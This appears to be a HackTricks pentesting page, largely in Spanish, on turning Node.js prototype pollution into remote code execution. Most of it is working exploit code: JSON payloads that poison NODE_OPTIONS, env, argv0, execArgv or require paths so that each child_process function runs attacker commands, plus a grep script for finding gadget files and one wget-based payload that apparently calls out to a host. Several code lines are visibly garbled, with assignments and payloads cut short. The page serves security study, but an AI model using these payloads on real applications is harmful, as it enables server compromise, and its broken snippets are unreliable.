Prototype Pollution to RCE

Support HackTricks

Código Vulnerable

Imagina un JS real usando un código como el siguiente:

const { execSync, fork } = require('child_process');

function isObject(obj) {
console.log(typeof obj);
return typeof obj === 'function' || typeof obj === 'object';

// Function vulnerable to prototype pollution
function merge(target, source) {
for (let key in source) {
if (isObject(target[key]) && isObject(source[key])) {
merge(target[key], source[key]);
} else {
target[key] = source[key];
return target;

function clone(target) {
return merge({}, target);

// Run prototype pollution with user input
// Check in the next sections what payload put here to execute arbitrary code

// Spawn process, this will call the gadget that poputales env variables
// Create an a_file.js file in the current dir: `echo a=2 > a_file.js`
var proc = fork('a_file.js');

PP2RCE a través de vars de entorno

PP2RCE significa Contaminación de Prototipos a RCE (Ejecución Remota de Código).

Según este informe, cuando un proceso es generado con algún método de child_process (como fork o spawn u otros), llama al método normalizeSpawnArguments, que es un gadget de contaminación de prototipos para crear nuevas vars de entorno:

//See code in

var env = options.env || process.env;
var envPairs = [];
let envKeys = [];
// Prototype values are intentionally included.
for (const key in env) {
ArrayPrototypePush(envKeys, key);
for (const key of envKeys) {
const value = env[key];
if (value !== undefined) {
ArrayPrototypePush(envPairs, `${key}=${value}`); // <-- Pollution

Check that code you can see it's possible en poison envPairs just by polluting the attribute .env.

Poisoning __proto__

Note that due to how the normalizeSpawnArguments function from the child_process library of node works, when something is called in order to set a new env variable for the process you just need to pollute anything. For example, if you do __proto__.avar="valuevar" el proceso será generado con una var llamada avar con valor valuevar.

However, in order for the env variable to be the first one you need to pollute the .env attribute and (only in some methods) that var will be the first one (allowing the attack).

That's why NODE_OPTIONS is not inside .env in the following attack.

const { execSync, fork } = require('child_process');

// Manual Pollution
b = {}
b.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/pp2rce').toString())//"}
b.__proto__.NODE_OPTIONS = "--require /proc/self/environ"

// Trigger gadget
var proc = fork('./a_file.js');
// This should create the file /tmp/pp2rec

// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"NODE_OPTIONS": "--require /proc/self/environ", "env": { "EVIL":"console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce\\\").toString())//"}}}')


var proc = fork('a_file.js');
// This should create the file /tmp/pp2rec

Envenenando constructor.prototype

const { execSync, fork } = require('child_process');

// Manual Pollution
b = {}
b.constructor.prototype.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/pp2rce2').toString())//"}
b.constructor.prototype.NODE_OPTIONS = "--require /proc/self/environ"

proc = fork('a_file.js');
// This should create the file /tmp/pp2rec2

// Abusing the vulnerable code
USERINPUT = JSON.parse('{"constructor": {"prototype": {"NODE_OPTIONS": "--require /proc/self/environ", "env": { "EVIL":"console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}}}')


var proc = fork('a_file.js');
// This should create the file /tmp/pp2rec2

PP2RCE a través de vars de entorno + cmdline

Se propuso una carga útil similar a la anterior con algunos cambios en este artículo. Las principales diferencias son:

  • En lugar de almacenar la carga útil de nodejs dentro del archivo /proc/self/environ, se almacena dentro de argv0 de /proc/self/cmdline.

  • Luego, en lugar de requerir a través de NODE_OPTIONS el archivo /proc/self/environ, requiere /proc/self/cmdline.

const { execSync, fork } = require('child_process');

// Manual Pollution
b = {}
b.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/pp2rce2').toString())//"
b.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"

// Trigger gadget
var proc = fork('./a_file.js');
// This should create the file /tmp/pp2rec2

// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}')


var proc = fork('a_file.js');
// This should create the file /tmp/pp2rec

Interacción DNS

Usando las siguientes cargas útiles, es posible abusar de la variable de entorno NODE_OPTIONS de la que hemos hablado anteriormente y detectar si funcionó con una interacción DNS:

"__proto__": {

O, para evitar que los WAFs pidan el dominio:

"__proto__": {

PP2RCE vuln child_process functions

En esta sección vamos a analizar cada función de child_process para ejecutar código y ver si podemos usar alguna técnica para forzar que esa función ejecute código:

exec explotación
// environ trick - not working
// It's not possible to pollute the .env attr to create a first env var
// because options.env is null (not undefined)

// cmdline trick - working with small variation
// Working after kEmptyObject (fix)
const { exec } = require('child_process');
p = {} = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/exec-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = exec('something');

// stdin trick - not working
// Not using stdin

// Windows
// Working after kEmptyObject (fix)
const { exec } = require('child_process');
p = {} = "\\\\\\C$\\Windows\\System32\\calc.exe"
var proc = exec('something');
execFile explotación

```javascript // environ trick - not working // It's not possible to pollute the .en attr to create a first env var

// cmdline trick - working with a big requirement // Working after kEmptyObject (fix) const { execFile } = require('child_process'); p = {} = "/proc/self/exe" //You need to make sure the node executable is executed p.proto.argv0 = "console.log(require('child_process').execSync('touch /tmp/execFile-cmdline').toString())//" p.proto.NODE_OPTIONS = "--require /proc/self/cmdline" var proc = execFile('/usr/bin/node');

// stdin trick - not working // Not using stdin

// Windows - not working

Para que **`execFile`** funcione, **DEBE** ejecutar node para que NODE\_OPTIONS funcione.\
Si **no** está ejecutando **node**, necesitas encontrar cómo podrías **alterar la ejecución** de lo que sea que esté ejecutando **con variables de entorno** y configurarlas.

Las **otras** técnicas **funcionan** sin este requisito porque es **posible modificar** **lo que se ejecuta** a través de la contaminación del prototipo. (En este caso, incluso si puedes contaminar `.shell`, no contaminarás lo que se está ejecutando).



<summary><code>fork</code> explotación</summary>

<div data-gb-custom-block data-tag="code" data-overflow='wrap'>

// environ trick - working
// Working after kEmptyObject (fix)
const { fork } = require('child_process');
b = {}
b.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/fork-environ').toString())//"}
b.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = fork('something');

// cmdline trick - working
// Working after kEmptyObject (fix)
const { fork } = require('child_process');
p = {}
p.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/fork-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = fork('something');

// stdin trick - not working
// Not using stdin

// execArgv trick - working
// Only the fork method has this attribute
// Working after kEmptyObject (fix)
const { fork } = require('child_process');
b = {}
b.__proto__.execPath = "/bin/sh"
b.__proto__.argv0 = "/bin/sh"
b.__proto__.execArgv = ["-c", "touch /tmp/fork-execArgv"]
var proc = fork('./a_file.js');

// Windows
// Working after kEmptyObject (fix)
const { fork } = require('child_process');
b = {}
b.__proto__.execPath = "\\\\\\C$\\Windows\\System32\\calc.exe"
var proc = fork('./a_file.js');
spawn explotación
// environ trick - working with small variation (shell and argv0)
// NOT working after kEmptyObject (fix) without options
const { spawn } = require('child_process');
p = {}
// If in windows or mac you need to change the following params to the path of ndoe
p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/spawn-environ').toString())//"}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = spawn('something');
//var proc = spawn('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)

// cmdline trick - working with small variation (shell)
// NOT working after kEmptyObject (fix) without options
const { spawn } = require('child_process');
p = {} = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/spawn-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = spawn('something');
//var proc = spawn('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)

// stdin trick - not working
// Not using stdin

// Windows
// NOT working after require(fix) without options
const { spawn } = require('child_process');
p = {} = "\\\\\\C$\\Windows\\System32\\calc.exe"
var proc = spawn('something');
//var proc = spawn('something',[],{"cwd":"C:\\"}); //To work after kEmptyObject (fix)
execFileSync explotación
// environ trick - working with small variation (shell and argv0)
// Working after kEmptyObject (fix)
const { execFileSync } = require('child_process');
p = {}
// If in windows or mac you need to change the following params to the path of ndoe
p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/execFileSync-environ').toString())//"}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = execFileSync('something');

// cmdline trick - working with small variation (shell)
// Working after kEmptyObject (fix)
const { execFileSync } = require('child_process');
p = {} = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/execFileSync-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = execFileSync('something');

// stdin trick - working
// Working after kEmptyObject (fix)
const { execFileSync } = require('child_process');
p = {}
p.__proto__.argv0 = "/usr/bin/vim" = "/usr/bin/vim"
p.__proto__.input = ':!{touch /tmp/execFileSync-stdin}\n'
var proc = execFileSync('something');

// Windows
// Working after kEmptyObject (fix)
const { execSync } = require('child_process');
p = {} = "\\\\\\C$\\Windows\\System32\\calc.exe"
p.__proto__.argv0 = "\\\\\\C$\\Windows\\System32\\calc.exe"
var proc = execSync('something');
execSync explotación
// environ trick - working with small variation (shell and argv0)
// Working after kEmptyObject (fix)
const { execSync } = require('child_process');
p = {}
// If in windows or mac you need to change the following params to the path of ndoe
p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/execSync-environ').toString())//"}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = execSync('something');

// cmdline trick - working with small variation (shell)
// Working after kEmptyObject (fix)
const { execSync } = require('child_process');
p = {} = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/execSync-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = execSync('something');

// stdin trick - working
// Working after kEmptyObject (fix)
const { execSync } = require('child_process');
p = {}
p.__proto__.argv0 = "/usr/bin/vim" = "/usr/bin/vim"
p.__proto__.input = ':!{touch /tmp/execSync-stdin}\n'
var proc = execSync('something');

// Windows
// Working after kEmptyObject (fix)
const { execSync } = require('child_process');
p = {} = "\\\\\\C$\\Windows\\System32\\calc.exe"
var proc = execSync('something');
spawnSync explotación
// environ trick - working with small variation (shell and argv0)
// NOT working after kEmptyObject (fix) without options
const { spawnSync } = require('child_process');
p = {}
// If in windows or mac you need to change the following params to the path of node
p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/spawnSync-environ').toString())//"}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = spawnSync('something');
//var proc = spawnSync('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)

// cmdline trick - working with small variation (shell)
// NOT working after kEmptyObject (fix) without options
const { spawnSync } = require('child_process');
p = {} = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/spawnSync-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = spawnSync('something');
//var proc = spawnSync('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)

// stdin trick - working
// NOT working after kEmptyObject (fix) without options
const { spawnSync } = require('child_process');
p = {}
p.__proto__.argv0 = "/usr/bin/vim" = "/usr/bin/vim"
p.__proto__.input = ':!{touch /tmp/spawnSync-stdin}\n'
var proc = spawnSync('something');
//var proc = spawnSync('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)

// Windows
// NOT working after require(fix) without options
const { spawnSync } = require('child_process');
p = {} = "\\\\\\C$\\Windows\\System32\\calc.exe"
var proc = spawnSync('something');
//var proc = spawnSync('something',[],{"cwd":"C:\\"}); //To work after kEmptyObject (fix)

Forzar Spawn

En los ejemplos anteriores, viste cómo activar el gadget; una funcionalidad que llama a spawn necesita estar presente (todos los métodos de child_process utilizados para ejecutar algo lo llaman). En el ejemplo anterior, eso era parte del código, pero ¿qué pasa si el código no lo está llamando?

Controlando una ruta de archivo require

En este otro informe, el usuario puede controlar la ruta del archivo donde se ejecutará un require. En ese escenario, el atacante solo necesita encontrar un archivo .js dentro del sistema que ejecute un método spawn cuando se importe. Algunos ejemplos de archivos comunes que llaman a una función spawn cuando se importan son:

  • /path/to/npm/scripts/changelog.js

  • /opt/yarn-v1.22.19/preinstall.js

  • Encuentra más archivos a continuación

El siguiente script simple buscará llamadas de child_process sin ningún relleno (para evitar mostrar llamadas dentro de funciones):

find / -name "*.js" -type f -exec grep -l "child_process" {} \; 2>/dev/null | while read file_path; do
grep --with-filename -nE "^[a-zA-Z].*(exec\(|execFile\(|fork\(|spawn\(|execFileSync\(|execSync\(|spawnSync\()" "$file_path" | grep -v "require(" | grep -v "function " | grep -v "util.deprecate" | sed -E 's/.{255,}.*//'
# Note that this way of finding child_process executions just importing might not find valid scripts as functions called in the root containing child_process calls won't be found.
Archivos interesantes encontrados por el script anterior
  • node_modules/buffer/bin/download-node-tests.js:17:cp.execSync('rm -rf node/*.js', { cwd: path.join(__dirname, '../test') })

  • node_modules/buffer/bin/test.js:10:var node = cp.spawn('npm', ['run', 'test-node'], { stdio: 'inherit' })

  • node_modules/npm/scripts/changelog.js:16:const log = execSync(git log --reverse --pretty='format:%h %H%d %s (%aN)%n%b%n---%n' ${branch}...).toString().split(/\n/)

  • node_modules/detect-libc/bin/detect-libc.js:18:process.exit(spawnSync(process.argv[2], process.argv.slice(3), spawnOptions).status);

  • node_modules/jest-expo/bin/jest.js:26:const result = childProcess.spawnSync('node', jestWithArgs, { stdio: 'inherit' });

  • node_modules/buffer/bin/download-node-tests.js:17:cp.execSync('rm -rf node/*.js', { cwd: path.join(__dirname, '../test') })

  • node_modules/buffer/bin/test.js:10:var node = cp.spawn('npm', ['run', 'test-node'], { stdio: 'inherit' })

  • node_modules/runtypes/scripts/format.js:13:const npmBinPath = execSync('npm bin').toString().trim();

  • node_modules/node-pty/scripts/publish.js:31:const result = cp.spawn('npm', args, { stdio: 'inherit' });

Estableciendo la ruta del archivo requerido a través de la contaminación del prototipo

La técnica anterior requiere que el usuario controle la ruta del archivo que va a ser requerido. Pero esto no siempre es cierto.

Sin embargo, si el código va a ejecutar un require después de la contaminación del prototipo, incluso si no controlas la ruta que va a ser requerida, puedes forzar una diferente abusando de la contaminación del prototipo. Así que incluso si la línea de código es como require("./a_file.js") o require("bytes"), requerirá el paquete que contaminaste.

Por lo tanto, si se ejecuta un require después de tu contaminación del prototipo y no hay función de spawn, este es el ataque:

  • Encuentra un archivo .js dentro del sistema que cuando sea requerido ejecutará algo usando child_process

  • Si puedes subir archivos a la plataforma que estás atacando, podrías subir un archivo así

  • Contamina las rutas para forzar la carga del require del archivo .js que ejecutará algo con child_process

  • Contamina el entorno/cmdline para ejecutar código arbitrario cuando se llame a una función de ejecución de child_process (ver las técnicas iniciales)

Require absoluto

Si el require realizado es absoluto (require("bytes")) y el paquete no contiene main en el archivo package.json, puedes contaminar el atributo main y hacer que el require ejecute un archivo diferente.

// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab

// Install package bytes (it doesn't have a main in package.json)
// npm install bytes

// Manual Pollution
b = {}
b.__proto__.main = "/tmp/malicious.js"

// Trigger gadget
var proc = require('bytes');
// This should execute the file /tmp/malicious.js
// The relative path doesn't even need to exist

// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"main": "/tmp/malicious.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce_absolute\\\").toString())//"}}')


var proc = require('bytes');
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec

Requerimiento relativo - 1

Si se carga una ruta relativa en lugar de una ruta absoluta, puedes hacer que node cargue una ruta diferente:

// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab

// Manual Pollution
b = {}
b.__proto__.exports = { ".": "./malicious.js" }
b.__proto__["1"] = "/tmp"

// Trigger gadget
var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js
// The relative path doesn't even need to exist

// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"exports": {".": "./malicious.js"}, "1": "/tmp", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce_exports_1\\\").toString())//"}}')


var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec

Requerimiento relativo - 2

// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab

// Manual Pollution
b = {} = {} = { ".": "./malicious.js" }
b.__proto__.path = "/tmp" = "./relative_path.js" //This needs to be the relative path that will be imported in the require

// Trigger gadget
var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js
// The relative path doesn't even need to exist

// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"data": {"exports": {".": "./malicious.js"}}, "path": "/tmp", "name": "./relative_path.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce_exports_path\\\").toString())//"}}')


var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec

Requerimiento relativo - 3

Similar al anterior, esto fue encontrado en este informe.

// Requiring /opt/yarn-v1.22.19/preinstall.js
Object.prototype["data"] = {
exports: {
".": "./preinstall.js"
name: './usage'
Object.prototype["path"] = '/opt/yarn-v1.22.19' = "node"
Object.prototype["npm_config_global"] = 1
Object.prototype.env = {
"NODE_DEBUG": "console.log(require('child_process').execSync('wget${IFS}').toString());process.exit()//",
"NODE_OPTIONS": "--require=/proc/self/environ"


VM Gadgets

En el documento también se indica que el control de contextExtensions de algunos métodos de la biblioteca vm podría usarse como un gadget. Sin embargo, al igual que los métodos child_process anteriores, ha sido arreglado en las últimas versiones.

Fixes & Unexpected protections

Por favor, ten en cuenta que la contaminación de prototipos funciona si el atributo de un objeto que se está accediendo es undefined. Si en el código ese atributo se establece a un valor, no podrás sobrescribirlo.

En junio de 2022, a partir de este commit, la var options en lugar de un {} es un kEmptyObject. Lo que previene que una contaminación de prototipos afecte los atributos de options para obtener RCE. Al menos desde v18.4.0, esta protección ha sido implementada, y por lo tanto, los exploits de spawn y spawnSync que afectan los métodos ya no funcionan (¡si no se utilizan options!).

En este commit, la contaminación de prototipos de contextExtensions de la biblioteca vm fue también en parte arreglada configurando opciones a kEmptyObject en lugar de {}.

Other Gadgets


Support HackTricks

Last updated